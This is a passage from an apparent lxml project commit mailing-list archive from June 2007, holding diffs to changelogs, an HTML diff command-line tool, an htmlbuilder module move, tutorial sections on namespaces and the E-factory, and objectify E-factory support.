e) + return False + + if not callable(xpath): + xpath = et.XPath(xpath) + + results = xpath(tree) + if results 
== []: + return False + if print_name: + print ">> %s" % f + if options.verbose: + print_results(results) + return True + except Exception, e: + print >> sys.stderr, "ERR: %r: %s: %s" % ( + filename, e.__class__.__name__, e) + return False + +def register_builtins(): + ns = et.FunctionNamespace(PYTHON_BUILTINS_NS) + for (name, builtin) in vars(__builtins__).iteritems(): + if callable(builtin): + if not name.startswith('_') and name == name.lower(): + ns[name] = builtin + + str_xpath = et.XPath("string()") + def lower(_, s): + if isinstance(s, list): + if not s: + return '' + s = s[0] + if not isinstance(s, basestring): + if isinstance(s, bool): + s = str(s) + else: + s = str_xpath(s) + return s.lower() + def upper(_, s): + if isinstance(s, list): + if not s: + return '' + s = s[0] + if not isinstance(s, basestring): + if isinstance(s, bool): + s = str(s) + else: + s = str_xpath(s) + return s.upper() + + ns["lower"] = lower + ns["upper"] = upper + + +def parse_options(): + from optparse import OptionParser + + usage = "usage: %prog [options] XPATH [FILE ...]" + + parser = OptionParser( + usage = usage, + version = "%prog using lxml.etree " + et.__version__, + description = SHORT_DESCRIPTION) + parser.add_option("-H", "--long-help", + action="store_true", dest="long_help", default=False, + help="a longer help text including usage examples") + parser.add_option("-i", "--xinclude", + action="store_true", dest="xinclude", default=False, + help="run XInclude on the file before XPath") + parser.add_option("--no-python", + action="store_false", dest="python", default=True, + help="disable Python builtins (prefix 'py')") + parser.add_option("--no-regexp", + action="store_false", dest="regexp", default=True, + help="disable regular expressions (prefix 're')") + parser.add_option("-q", "--quiet", + action="store_false", dest="verbose", default=True, + help="don't print status messages to stdout") + + options, args = parser.parse_args() + + if options.long_help: + 
parser.print_help() + print __doc__[__doc__.find('\n\n')+1:] + sys.exit(0) + + if len(args) < 1: + parser.error("first argument must be an XPath expression") + + return options, args + + +if __name__ == "__main__": + options, args = parse_options() + + namespaces = {} + if options.regexp: + namespaces["re"] = REGEXP_NS + if options.python: + register_builtins() + namespaces["py"] = PYTHON_BUILTINS_NS + + xpath = et.XPath(args[0], namespaces) + + found = False + if len(args) == 1: + found = find_in_file( + sys.stdin, xpath, print_name, options.xinclude) + else: + print_name = len(args) > 2 + for filename in itertools.islice(args, 1, None): + found |= find_in_file( + filename, xpath, print_name, options.xinclude) + + if found: + sys.exit(0) + else: + sys.exit(1) From scoder at codespeak.net Mon Jun 25 11:12:55 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 11:12:55 +0200 (CEST) Subject: [Lxml-checkins] r44499 - in lxml/branch/lxml-1.3: . src/lxml Message-ID: <20070625091255.DFEC880F1@code0.codespeak.net> Author: scoder Date: Mon Jun 25 11:12:54 2007 New Revision: 44499 Modified: lxml/branch/lxml-1.3/INSTALL.txt lxml/branch/lxml-1.3/src/lxml/etree.pyx Log: comments on libxml2 versions Modified: lxml/branch/lxml-1.3/INSTALL.txt ============================================================================== --- lxml/branch/lxml-1.3/INSTALL.txt (original) +++ lxml/branch/lxml-1.3/INSTALL.txt Mon Jun 25 11:12:54 2007 @@ -11,6 +11,8 @@ * libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html + If you want to use XPath reliably, try to avoid libxml2 2.6.27. + * libxslt 1.1.15 or later. 
It can be found here: http://xmlsoft.org/XSLT/downloads.html Modified: lxml/branch/lxml-1.3/src/lxml/etree.pyx ============================================================================== --- lxml/branch/lxml-1.3/src/lxml/etree.pyx (original) +++ lxml/branch/lxml-1.3/src/lxml/etree.pyx Mon Jun 25 11:12:54 2007 @@ -1408,7 +1408,7 @@ FTP. Note that XInclude does not support custom resolvers in Python space - due to restrictions of libxml2 <= 2.6.28. + due to restrictions of libxml2 <= 2.6.29. """ cdef python.PyThreadState* state cdef int result From scoder at codespeak.net Mon Jun 25 15:54:47 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 15:54:47 +0200 (CEST) Subject: [Lxml-checkins] r44508 - lxml/trunk Message-ID: <20070625135447.10F7D80CD@code0.codespeak.net> Author: scoder Date: Mon Jun 25 15:54:46 2007 New Revision: 44508 Modified: lxml/trunk/CHANGES.txt Log: changelog consolidation Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Mon Jun 25 15:54:46 2007 @@ -8,6 +8,23 @@ Features added -------------- +* Entity support through an ``Entity`` factory and element classes. XML + parsers now have a ``resolve_entities`` keyword argument that can be set to + False to keep entities in the document. + +* ``column`` field on error log entries to accompany the ``line`` field + +* Error specific messages in XPath parsing and evaluation + NOTE: for evaluation errors, you will now get an XPathEvalError instead of + an XPathSyntaxError. 
To catch both, you can except on ``XPathError`` + +* The regular expression functions in XPath now support passing a node-set + instead of a string + +* Extended type annotation in objectify: new ``xsiannotate()`` function + +* EXSLT RegExp support in standard XPath (not only XSLT) + Bugs fixed ---------- @@ -21,30 +38,21 @@ Features added -------------- -* Parsers take a ``remove_comments`` keyword argument that skips over comments +* Module ``lxml.pyclasslookup`` module implements an Element class lookup + scheme that can access the entire tree in read-only mode to help determining + a suitable Element class -* Entity support through an ``Entity`` factory and element classes. XML - parsers now have a ``resolve_entities`` keyword argument that can be set to - False to keep entities in the document. +* Parsers take a ``remove_comments`` keyword argument that skips over comments * ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. -* ``column`` field on error log entries to accompany the ``line`` field - -* Error specific messages in XPath parsing and evaluation - NOTE: for evaluation errors, you will now get an XPathEvalError instead of - an XPathSyntaxError. To catch both, you can except on ``XPathError`` - -* The regular expression functions in XPath now support passing a node-set - instead of a string - * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support adding processing instructions and comments around the root node * ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods * Extended type annotation in objectify: cleaner annotation namespace setup - plus new ``xsiannotate()`` and ``deannotate()`` functions + plus new ``deannotate()`` function * Support for custom Element class instantiation in lxml.sax: passing a ``makeelement`` function to the ElementTreeContentHandler will reuse the @@ -52,16 +60,24 @@ * '.' 
represents empty ObjectPath (identity) -* EXSLT RegExp support in standard XPath (not only XSLT) - -* ``lxml.pyclasslookup`` module that can access the entire tree in read-only - mode to help determining a suitable Element class - * ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` * ``collectAttributes()`` C-function to build a list of attribute keys/values/items for a libxml2 node +* ``DTD`` validator class (like ``RelaxNG`` and ``XMLSchema``) + +* HTML generator helpers by Fredrik Lundh in ``lxml.htmlbuilder`` + +* ``ElementMaker`` XML generator by Fredrik Lundh in ``lxml.builder.E`` + +* Support for pickeling ``objectify.ObjectifiedElement`` objects to XML + +* ``update()`` method on Element.attrib + +* Optimised replacement for libxml2's _xmlReconsiliateNs(). This allows lxml + a better handling of namespaces when moving elements between documents. + Bugs fixed ---------- @@ -102,40 +118,14 @@ * Raise AssertionError when passing strings containing '\0' bytes -Other changes -------------- - -* major refactoring in XPath/XSLT extension function code - - -1.3beta (2007-02-27) -==================== - -Features added --------------- - -* ``DTD`` validator class (like ``RelaxNG`` and ``XMLSchema``) - -* HTML generator helpers by Fredrik Lundh in ``lxml.htmlbuilder`` - -* ``ElementMaker`` XML generator by Fredrik Lundh in ``lxml.builder.E`` - -* Support for pickeling ``objectify.ObjectifiedElement`` objects to XML - -* ``update()`` method on Element.attrib - -* Optimised replacement for libxml2's _xmlReconsiliateNs(). This allows lxml - a better handling of namespaces when moving elements between documents. 
- -Bugs fixed ----------- - * Possible memory leaks in namespace handling when moving elements between documents Other changes ------------- +* major refactoring in XPath/XSLT extension function code + * major restructuring in the documentation From scoder at codespeak.net Mon Jun 25 16:22:17 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 16:22:17 +0200 (CEST) Subject: [Lxml-checkins] r44510 - lxml/trunk Message-ID: <20070625142217.C7B6980E4@code0.codespeak.net> Author: scoder Date: Mon Jun 25 16:22:17 2007 New Revision: 44510 Modified: lxml/trunk/CHANGES.txt Log: changelog cleanup after release of 1.3 Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Mon Jun 25 16:22:17 2007 @@ -28,9 +28,20 @@ Bugs fixed ---------- +* The XML parser did not report undefined entities as error + +* The text in exceptions raised by XML parsers, validators and XPath + evaluators now reports the first error that occurred instead of the last + +* passing '' as XPath namespace prefix did not raise an error + +* Thread safety in XPath evaluators + Other changes ------------- +* major refactoring in XPath/XSLT extension function code + 1.3 (2007-06-24) ================ @@ -89,18 +100,14 @@ * Replacing the children slice of an Element would cut off the tails of the original children -* API functions now check incoming strings for XML conformity. Zero bytes or - low ASCII characters are no longer accepted. - -* The XML parser did not report undefined entities as error +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags -* The text in exceptions raised by XML parsers, validators and XPath - evaluators now reports the first error that occurred instead of the last +* API functions now check incoming strings for XML conformity. 
Zero bytes or + low ASCII characters are no longer accepted (AssertionError). * XSLT parsing failed to pass resolver context on to imported documents -* passing '' as XPath namespace prefix did not raise an error - * passing '' as namespace prefix in nsmap could be passed through to libxml2 * Objectify couldn't handle prefixed XSD type names in ``xsi:type`` @@ -114,18 +121,12 @@ * lxml.sax failed on comments and PIs. Comments are now properly ignored and PIs are copied. -* Thread safety in XPath evaluators - -* Raise AssertionError when passing strings containing '\0' bytes - * Possible memory leaks in namespace handling when moving elements between documents Other changes ------------- -* major refactoring in XPath/XSLT extension function code - * major restructuring in the documentation From scoder at codespeak.net Mon Jun 25 16:22:24 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 16:22:24 +0200 (CEST) Subject: [Lxml-checkins] r44511 - lxml/branch/lxml-1.3 Message-ID: <20070625142224.8911980E9@code0.codespeak.net> Author: scoder Date: Mon Jun 25 16:22:24 2007 New Revision: 44511 Modified: lxml/branch/lxml-1.3/CHANGES.txt Log: changelog cleanup after release of 1.3 Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Mon Jun 25 16:22:24 2007 @@ -8,8 +8,9 @@ Features added -------------- -* Module ``lxml.pyclasslookup`` implemens an Element class lookup scheme that - can access the entire tree to determine a suitable Element class +* Module ``lxml.pyclasslookup`` module implements an Element class lookup + scheme that can access the entire tree in read-only mode to help determining + a suitable Element class * Parsers take a ``remove_comments`` keyword argument that skips over comments @@ -18,6 +19,8 @@ * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to 
support adding processing instructions and comments around the root node +* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods + * Extended type annotation in objectify: cleaner annotation namespace setup plus new ``deannotate()`` function @@ -27,6 +30,11 @@ * '.' represents empty ObjectPath (identity) +* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` + +* ``collectAttributes()`` C-function to build a list of attribute + keys/values/items for a libxml2 node + Bugs fixed ---------- @@ -42,13 +50,15 @@ ``ProcessingInstruction`` as tags * API functions now check incoming strings for XML conformity. Zero bytes or - low ASCII characters are no longer accepted. + low ASCII characters are no longer accepted (AssertionError). * XSLT parsing failed to pass resolver context on to imported documents -* More ET compatible behaviour when writing out XML declarations or not +* passing '' as namespace prefix in nsmap could be passed through to libxml2 -* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods +* Objectify couldn't handle prefixed XSD type names in ``xsi:type`` + +* More ET compatible behaviour when writing out XML declarations or not * More robust error handling in ``iterparse()`` @@ -57,8 +67,6 @@ * lxml.sax failed on comments and PIs. Comments are now properly ignored and PIs are copied. 
-* Raise AssertionError when passing strings containing '\0' bytes - 1.3beta (2007-02-27) ==================== From scoder at codespeak.net Mon Jun 25 16:56:12 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 16:56:12 +0200 (CEST) Subject: [Lxml-checkins] r44514 - lxml/trunk/src/lxml Message-ID: <20070625145612.3A1CB80B5@code0.codespeak.net> Author: scoder Date: Mon Jun 25 16:56:11 2007 New Revision: 44514 Modified: lxml/trunk/src/lxml/xmlschema.pxi Log: libxml2 crash bug in xmlschema is not fixed in 2.6.24 Modified: lxml/trunk/src/lxml/xmlschema.pxi ============================================================================== --- lxml/trunk/src/lxml/xmlschema.pxi (original) +++ lxml/trunk/src/lxml/xmlschema.pxi Mon Jun 25 16:56:11 2007 @@ -38,12 +38,12 @@ root_node = _rootNodeOrRaise(etree) # work around for libxml2 bug if document is not XML schema at all - if _LIBXML_VERSION_INT < 20624: - c_node = root_node._c_node - c_href = _getNs(c_node) - if c_href is NULL or \ - cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: - raise XMLSchemaParseError, "Document is not XML Schema" + #if _LIBXML_VERSION_INT < 20624: + c_node = root_node._c_node + c_href = _getNs(c_node) + if c_href is NULL or \ + cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: + raise XMLSchemaParseError, "Document is not XML Schema" fake_c_doc = _fakeRootDoc(doc._c_doc, root_node._c_node) self._error_log.connect() From ianb at codespeak.net Mon Jun 25 21:01:53 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Mon, 25 Jun 2007 21:01:53 +0200 (CEST) Subject: [Lxml-checkins] r44525 - lxml/branch/html/src/lxml/html Message-ID: <20070625190153.CD50180E4@code0.codespeak.net> Author: ianb Date: Mon Jun 25 21:01:53 2007 New Revision: 44525 Added: lxml/branch/html/src/lxml/html/_diffcommand.py Modified: lxml/branch/html/src/lxml/html/diff.py Log: Added the start of a diffing command-line Added: 
lxml/branch/html/src/lxml/html/_diffcommand.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/_diffcommand.py Mon Jun 25 21:01:53 2007 @@ -0,0 +1,87 @@ +import optparse +import sys +import re +import os +from lxml.html.diff import htmldiff + +description = """\ +""" + +parser = optparse.OptionParser( + usage="%prog [OPTIONS] FILE1 FILE2\n" + "%prog --annotate [OPTIONS] INFO1 FILE1 INFO2 FILE2 ...", + description=description, + ) + +parser.add_option( + '-o', '--output', + metavar="FILE", + dest="output", + default="-", + help="File to write the difference to", + ) + +parser.add_option( + '-a', '--annotation', + action="store_true", + dest="annotation", + help="Do an annotation") + +def main(args=None): + if args is None: + args = sys.argv[1:] + options, args = parser.parse_args(args) + if options.annotation: + return annotate(options, args) + if len(args) != 2: + print 'Error: you must give two files' + parser.print_help() + sys.exit(1) + file1, file2 = args + input1 = read_file(file1) + input2 = read_file(file2) + body1 = split_body(input1)[1] + pre, body2, post = split_body(input2) + result = htmldiff(body1, body2) + result = pre + result + post + if options.output == '-': + if not result.endswith('\n'): + result += '\n' + sys.stdout.write(result) + else: + f = open(options.output, 'wb') + f.write(result) + f.close() + +def read_file(filename): + if filename == '-': + c = sys.stdin.read() + elif not os.path.exists(filename): + raise OSError( + "Input file %s does not exist" % filename) + else: + f = open(filename, 'rb') + c = f.read() + f.close() + return c + +body_start_re = re.compile( + r"", re.I|re.S) +body_end_re = re.compile( + r"", re.I|re.S) + +def split_body(html): + match = body_start_re.search(html) + if match: + pre = html[:match.end()] + html = html[match.end():] + match = body_end_re.search(html) + if match: + post = html[match.start():] + html = html[:match.start()] 
+ return pre, html, post + +def annotate(options, args): + print "Not yet implemented" + sys.exit(1) + Modified: lxml/branch/html/src/lxml/html/diff.py ============================================================================== --- lxml/branch/html/src/lxml/html/diff.py (original) +++ lxml/branch/html/src/lxml/html/diff.py Mon Jun 25 21:01:53 2007 @@ -865,27 +865,8 @@ return [item for item in actual if item[2] > threshold or not item[2]] - -# def get_matching_blocks(self): -# size = min(len(self.b), len(self.b)) -# threshold = min(self.threshold, size / 4) -# actual = difflib.SequenceMatcher.get_matching_blocks(self) -# last_equal_a = 0 -# eliminate = [] -# for i in xrange(1, len(actual)-1): -# start_diff_length = actual[i][0] - (actual[i-1][0] + actual[i-1][2]) -# end_diff_length = actual[i+1][0] -# for a_pos, b_pos, length in actual: -# if (last_equal_a - a_pos is big -# and length is small -# and next_equal_a is far away): -# continue -# result.append((a_pos, b_pos, length)) -# last_equal_a = a_pos+length -# return result - if __name__ == '__main__': - import doctest - doctest.testmod() - + from lxml.html import _diffcommand + _diffcommand.main() + From scoder at codespeak.net Mon Jun 25 21:40:48 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 21:40:48 +0200 (CEST) Subject: [Lxml-checkins] r44526 - in lxml/branch/html/src/lxml: . 
html Message-ID: <20070625194048.30F8980D5@code0.codespeak.net> Author: scoder Date: Mon Jun 25 21:40:45 2007 New Revision: 44526 Added: lxml/branch/html/src/lxml/html/builder.py - copied, changed from r44515, lxml/branch/html/src/lxml/htmlbuilder.py Removed: lxml/branch/html/src/lxml/htmlbuilder.py Log: integrated lxml.htmlbuilder with lxml.html as lxml.html.builder Copied: lxml/branch/html/src/lxml/html/builder.py (from r44515, lxml/branch/html/src/lxml/htmlbuilder.py) ============================================================================== --- lxml/branch/html/src/lxml/htmlbuilder.py (original) +++ lxml/branch/html/src/lxml/html/builder.py Mon Jun 25 21:40:45 2007 @@ -24,7 +24,10 @@ """ -from builder import E +from lxml.builder import ElementMaker +from lxml.html import html_parser + +E = ElementMaker(makeelement=html_parser.makeelement) # elements A = E.a # anchor Deleted: /lxml/branch/html/src/lxml/htmlbuilder.py ============================================================================== --- /lxml/branch/html/src/lxml/htmlbuilder.py Mon Jun 25 21:40:45 2007 +++ (empty file) @@ -1,125 +0,0 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh - -Usage:: - - >>> from lxml.htmlbuilder import * - >>> html = HTML( - ... HEAD( TITLE("Hello World") ), - ... BODY( CLASS("main"), - ... H1("Hello World !") - ... ) - ... ) - - >>> import lxml.etree - >>> print lxml.etree.tostring(html, pretty_print=True) - - - Hello World - - -

Hello World !

- - - -""" - -from builder import E - -# elements -A = E.a # anchor -ABBR = E.abbr # abbreviated form (e.g., WWW, HTTP, etc.) -ACRONYM = E.acronym # -ADDRESS = E.address # information on author -APPLET = E.applet # Java applet (DEPRECATED) -AREA = E.area # client-side image map area -B = E.b # bold text style -BASE = E.base # document base URI -BASEFONT = E.basefont # base font size (DEPRECATED) -BDO = E.bdo # I18N BiDi over-ride -BIG = E.big # large text style -BLOCKQUOTE = E.blockquote # long quotation -BODY = E.body # document body -BR = E.br # forced line break -BUTTON = E.button # push button -CAPTION = E.caption # table caption -CENTER = E.center # shorthand for DIV align=center (DEPRECATED) -CITE = E.cite # citation -CODE = E.code # computer code fragment -COL = E.col # table column -COLGROUP = E.colgroup # table column group -DD = E.dd # definition description -DEL = getattr(E, 'del') # deleted text -DFN = E.dfn # instance definition -DIR = E.dir # directory list (DEPRECATED) -DIV = E.div # generic language/style container -DL = E.dl # definition list -DT = E.dt # definition term -EM = E.em # emphasis -FIELDSET = E.fieldset # form control group -FONT = E.font # local change to font (DEPRECATED) -FORM = E.form # interactive form -FRAME = E.frame # subwindow -FRAMESET = E.frameset # window subdivision -H1 = E.h1 # heading -H2 = E.h2 # heading -H3 = E.h3 # heading -H4 = E.h4 # heading -H5 = E.h5 # heading -H6 = E.h6 # heading -HEAD = E.head # document head -HR = E.hr # horizontal rule -HTML = E.html # document root element -I = E.i # italic text style -IFRAME = E.iframe # inline subwindow -IMG = E.img # Embedded image -INPUT = E.input # form control -INS = E.ins # inserted text -ISINDEX = E.isindex # single line prompt (DEPRECATED) -KBD = E.kbd # text to be entered by the user -LABEL = E.label # form field label text -LEGEND = E.legend # fieldset legend -LI = E.li # list item -LINK = E.link # a media-independent link -MAP = E.map # client-side image map -MENU 
= E.menu # menu list (DEPRECATED) -META = E.meta # generic metainformation -NOFRAMES = E.noframes # alternate content container for non frame-based rendering -NOSCRIPT = E.noscript # alternate content container for non script-based rendering -OBJECT = E.object # generic embedded object -OL = E.ol # ordered list -OPTGROUP = E.optgroup # option group -OPTION = E.option # selectable choice -P = E.p # paragraph -PARAM = E.param # named property value -PRE = E.pre # preformatted text -Q = E.q # short inline quotation -S = E.s # strike-through text style (DEPRECATED) -SAMP = E.samp # sample program output, scripts, etc. -SCRIPT = E.script # script statements -SELECT = E.select # option selector -SMALL = E.small # small text style -SPAN = E.span # generic language/style container -STRIKE = E.strike # strike-through text (DEPRECATED) -STRONG = E.strong # strong emphasis -STYLE = E.style # style info -SUB = E.sub # subscript -SUP = E.sup # superscript -TABLE = E.table # -TBODY = E.tbody # table body -TD = E.td # table data cell -TEXTAREA = E.textarea # multi-line text field -TFOOT = E.tfoot # table footer -TH = E.th # table header cell -THEAD = E.thead # table header -TITLE = E.title # document title -TR = E.tr # table row -TT = E.tt # teletype or monospaced text style -U = E.u # underlined text style (DEPRECATED) -UL = E.ul # unordered list -VAR = E.var # instance of a variable or program argument - -# attributes (only reserved words are included here) -ATTR = dict -def CLASS(v): return {'class': v} -def FOR(v): return {'for': v} From scoder at codespeak.net Mon Jun 25 21:49:02 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 21:49:02 +0200 (CEST) Subject: [Lxml-checkins] r44527 - lxml/trunk/doc Message-ID: <20070625194902.53AE580A3@code0.codespeak.net> Author: scoder Date: Mon Jun 25 21:49:01 2007 New Revision: 44527 Modified: lxml/trunk/doc/tutorial.txt Log: namespaces and the E-factory Modified: lxml/trunk/doc/tutorial.txt 
============================================================================== --- lxml/trunk/doc/tutorial.txt (original) +++ lxml/trunk/doc/tutorial.txt Mon Jun 25 21:49:01 2007 @@ -31,8 +31,8 @@ >>> from lxml import etree If your code only uses the ElementTree API and does not rely on any -functionality that is specific to ``lxml.etree``, you can also use the -following import chain as a fall-back to the original ElementTree:: +functionality that is specific to ``lxml.etree``, you can also use (any part +of) the following import chain as a fall-back to the original ElementTree:: try: from lxml import etree @@ -108,7 +108,7 @@ ------------------ To make the access to these subelements as easy and straight forward as -possible, elements behave exactly like normal Python lists:: +possible, elements behave like normal Python lists:: >>> child = root[0] >>> print child.tag @@ -133,7 +133,7 @@ >>> print end[0].tag child3 - >>> root[0] = root[-1] + >>> root[0] = root[-1] # this moves the element! >>> for child in root: ... print child.tag child3 @@ -239,9 +239,9 @@ >>> print etree.tostring(root) TEXT -In many XML documents (so-called *data-centric* documents), this is the only -place where text can be found. It is encapsulated by a leaf tag at the very -bottom of the tree hierarchy. +In many XML documents (*data-centric* documents), this is the only place where +text can be found. It is encapsulated by a leaf tag at the very bottom of the +tree hierarchy. However, if XML is used for tagged text documents such as (X)HTML, text can also appear between different elements, right in the middle of the tree:: @@ -249,9 +249,9 @@ Hello
World Here, the ``
`` tag is surrounded by text. This is often referred to as -*document-style* XML. Elements support this through their ``tail`` property. -It contains the text that directly follows the element, up to the next element -in the XML tree:: +*document-style* or *mixed-content* XML. Elements support this through their +``tail`` property. It contains the text that directly follows the element, up +to the next element in the XML tree:: >>> html = etree.Element("html") >>> body = etree.SubElement(html, "body") @@ -280,8 +280,8 @@ If you want to use this more often, you can wrap it in a function:: - >>> buildTextList = etree.XPath("//text()") # lxml.etree only! - >>> print buildTextList(html) + >>> build_text_list = etree.XPath("//text()") # lxml.etree only! + >>> print build_text_list(html) ['TEXT', 'TAIL'] .. _XPath: xpathxslt.html#xpath @@ -344,9 +344,148 @@ The parse() function -------------------- + Namespaces ========== +The ElementTree API avoids `namespace prefixes`_ wherever possible and deploys +the real namespaces instead:: + + >>> xhtml = etree.Element("{http://www.w3.org/1999/xhtml}html") + >>> body = etree.SubElement(xhtml, "{http://www.w3.org/1999/xhtml}body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +.. _`namespace prefixes`: http://www.w3.org/TR/xml-names/#ns-qualnames + +As you can see, prefixes only become important when you serialise the result. +However, the above code becomes somewhat verbose due to the lengthy namespace +names. And retyping or copying a string over and over again is error prone. +It is therefore common practice to store a namespace URI in a global variable. +To adapt the namespace prefixes for serialisation, you can also pass a mapping +to the Element factory, e.g. 
to define the default namespace:: + + >>> XHTML_NAMESPACE = "http://www.w3.org/1999/xhtml" + >>> XHTML = "{%s}" % XHTML_NAMESPACE + + >>> NSMAP = {None : XHTML_NAMESPACE} # the default namespace (no prefix) + + >>> xhtml = etree.Element(XHTML + "html", nsmap=NSMAP) # lxml only! + >>> body = etree.SubElement(xhtml, XHTML + "body") + >>> body.text = "Hello World" + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + +Namespaces on attributes work alike:: + + >>> body.set(XHTML + "bgcolor", "#CCFFAA") + + >>> print etree.tostring(xhtml, pretty_print=True) + + Hello World + + + >>> print body.get("bgcolor") + None + >>> body.get(XHTML + "bgcolor") + '#CCFFAA' + +You can also use XPath in this way:: + + >>> find_xhtml_body = etree.ETXPath( # lxml only ! + ... "//{%s}body" % XHTML_NAMESPACE) + >>> results = find_xhtml_body(xhtml) + + >>> print results[0].tag + {http://www.w3.org/1999/xhtml}body + + +The E-factory +============= + +The ``E-factory`` provides a simple and compact syntax for generating XML and +HTML:: + + >>> from lxml.builder import E + + >>> def CLASS(*args): # class is a reserved word in Python + ... return {"class":' '.join(args)} + + >>> html = page = ( + ... E.html( # create an Element called "html" + ... E.head( + ... E.title("This is a sample document") + ... ), + ... E.body( + ... E.h1("Hello!", CLASS("title")), + ... E.p("This is a paragraph with ", E.b("bold"), " text in it!"), + ... E.p("This is another paragraph, with a ", + ... E.a("link", href="http://www.python.org"), "."), + ... E.p("Here are some reservered characters: ."), + ... etree.XML("

And finally an embedded XHTML fragment.

"), + ... ) + ... ) + ... ) + + >>> print etree.tostring(page, pretty_print=True) + + + This is a sample document + + +

Hello!

+

This is a paragraph with bold text in it!

+

This is another paragraph, with a link.

+

Here are some reservered characters: <spam&egg>.

+

And finally an embedded XHTML fragment.

+ + + +The Element creation based on attribute access makes it easy to build up a +simple vocabulary for an XML language:: + + >>> DOC = E.doc + >>> TITLE = E.title + >>> SECTION = E.section + >>> PAR = E.par + + >>> my_doc = DOC( + ... TITLE("The dog and the hog"), + ... SECTION( + ... TITLE("The dog"), + ... PAR("Once upon a time, ..."), + ... PAR("And then ...") + ... ), + ... SECTION( + ... TITLE("The hog"), + ... PAR("Sooner or later ...") + ... ) + ... ) + + >>> print etree.tostring(my_doc, pretty_print=True) + + The dog and the hog +
+ The dog + Once upon a time, ... + And then ... +
+
+ The hog + Sooner or later ... +
+
+ +One such example is the module ``lxml.html.builder``, which provides a +vocabulary for HTML. + ElementPath =========== From scoder at codespeak.net Mon Jun 25 21:52:22 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 25 Jun 2007 21:52:22 +0200 (CEST) Subject: [Lxml-checkins] r44528 - in lxml/trunk: . doc src/lxml Message-ID: <20070625195222.7216E80D1@code0.codespeak.net> Author: scoder Date: Mon Jun 25 21:52:21 2007 New Revision: 44528 Modified: lxml/trunk/CHANGES.txt lxml/trunk/doc/objectify.txt lxml/trunk/src/lxml/builder.py lxml/trunk/src/lxml/objectify.pyx Log: support E-factory in objectify Modified: lxml/trunk/CHANGES.txt ============================================================================== --- lxml/trunk/CHANGES.txt (original) +++ lxml/trunk/CHANGES.txt Mon Jun 25 21:52:21 2007 @@ -8,6 +8,8 @@ Features added -------------- +* E-factory support for lxml.objectify (``objectify.E``) + * Entity support through an ``Entity`` factory and element classes. XML parsers now have a ``resolve_entities`` keyword argument that can be set to False to keep entities in the document. Modified: lxml/trunk/doc/objectify.txt ============================================================================== --- lxml/trunk/doc/objectify.txt (original) +++ lxml/trunk/doc/objectify.txt Mon Jun 25 21:52:21 2007 @@ -267,6 +267,25 @@ notB +Tree generation with the E-factory +---------------------------------- + +To simplify the generation of trees even further, you can use the E-factory:: + + >>> E = objectify.E + >>> root = E.root( + ... E.a("5"), + ... E.b("6") + ... 
) + + >>> print etree.tostring(root, pretty_print=True) + + 5 + 6 + + + + Namespace handling ------------------ Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Mon Jun 25 21:52:21 2007 @@ -140,7 +140,10 @@ elem[-1].tail = (elem[-1].tail or "") + item else: elem.text = (elem.text or "") + item - typemap[str] = typemap[unicode] = add_text + if str not in typemap: + typemap[str] = add_text + if unicode not in typemap: + typemap[unicode] = add_text def add_dict(elem, item): attrib = elem.attrib @@ -149,7 +152,8 @@ attrib[k] = v else: attrib[k] = typemap[type(v)](None, v) - typemap[dict] = add_dict + if dict not in typemap: + typemap[dict] = add_dict self._typemap = typemap Modified: lxml/trunk/src/lxml/objectify.pyx ============================================================================== --- lxml/trunk/src/lxml/objectify.pyx (original) +++ lxml/trunk/src/lxml/objectify.pyx Mon Jun 25 21:52:21 2007 @@ -65,6 +65,8 @@ cdef object islice from itertools import islice +cdef object _ElementMaker +from builder import ElementMaker as _ElementMaker # namespace/name for "pytype" hint attribute cdef object PYTYPE_NAMESPACE @@ -1846,6 +1848,34 @@ parser = objectify_parser return _parse(f, parser) +class ElementMaker(_ElementMaker): + def __init__(self, typemap=None): + if typemap is None: + typemap = {} + else: + typemap = typemap.copy() + + typemap[__builtin__.str] = __add_text + typemap[__builtin__.unicode] = __add_text + + _ElementMaker.__init__(self, typemap, objectify_parser.makeelement) + +def __add_text(cetree._Element elem not None, text): + cdef tree.xmlNode* c_child + c_child = cetree.findChildBackwards(elem._c_node, 0) + if c_child is not NULL: + old = cetree.tailOf(c_child) + if old is not None: + text = old + text + cetree.setTailText(c_child, text) + else: + old = cetree.textOf(elem._c_node) + if old is not 
